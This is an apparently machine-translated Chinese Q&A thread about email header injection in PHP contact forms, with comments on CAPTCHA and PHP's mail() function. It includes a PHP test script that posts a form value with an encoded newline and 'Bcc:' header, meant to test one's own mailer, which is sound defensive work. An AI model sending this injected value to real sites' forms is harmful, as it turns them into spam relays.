它看起来并不像使用表格直接输入注射工作得很好。我使用the following来测试一个我正在放在一起的邮件程序,它会发布脚本中的数据。 $postData
将不得不进行修改以适应您的表单。这只是一个个BCC“受害者”:
<?php
$postData =
'contactname=Lord+Sauron&'.
'[email protected]%0ABcc:[email protected]'.
'&message=Sorry+about+that+whole+ring+thing.+No+hard+feelings%3F';
$url = 'http://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF']).'/onetrueformmailer.php';
$result = do_post_request($url, $postData);
echo($result);
// http://wezfurlong.org/blog/2006/nov/http-post-from-php-without-curl/
function do_post_request($url, $data, $optional_headers = null) {
$params = array('http' => array(
'method' => 'POST',
'content' => $data
));
if ($optional_headers !== null) {
$params['http']['header'] = $optional_headers;
}
$ctx = stream_context_create($params);
$fp = @fopen($url, 'rb', false, $ctx);
if (!$fp) {
throw new Exception("Problem with $url, $php_errormsg");
}
$response = @stream_get_contents($fp);
if ($response === false) {
throw new Exception("Problem reading data from $url, $php_errormsg");
}
return $response;
}
?>
你好, 有没有你不使用CAPTCHA的原因吗? 垃圾邮件可以抓取您的网站,查看联系人表单并手动将发布的数据发送到表单的操作。然后,它将能够发送任何会收到表格联系信息的垃圾邮件。 如果你想自己玩这个游戏,你可以使用[Snoopy](http://sourceforge.net/projects/snoopy/)或其他任何可以让你轻松发送发布数据给你的图书馆形成。 如果您对收件人进行硬编码或接受文件上传,那么对我而言,听起来特别容易受到电子邮件注入的威胁。 – Andy
我正计划使用captcha来防止垃圾邮件发送随机表单,但我试图做的是保护自己免受恶意用户的侵害,但无论如何感谢您的回答,我会检查Snoopy。 – Mathew
我认为与电子邮件注入你指的是头注入。 php ['mail'函数](http://php.net/manual/en/function.mail.php)有一些额外的标题可以进入电子邮件的文档。 – hakre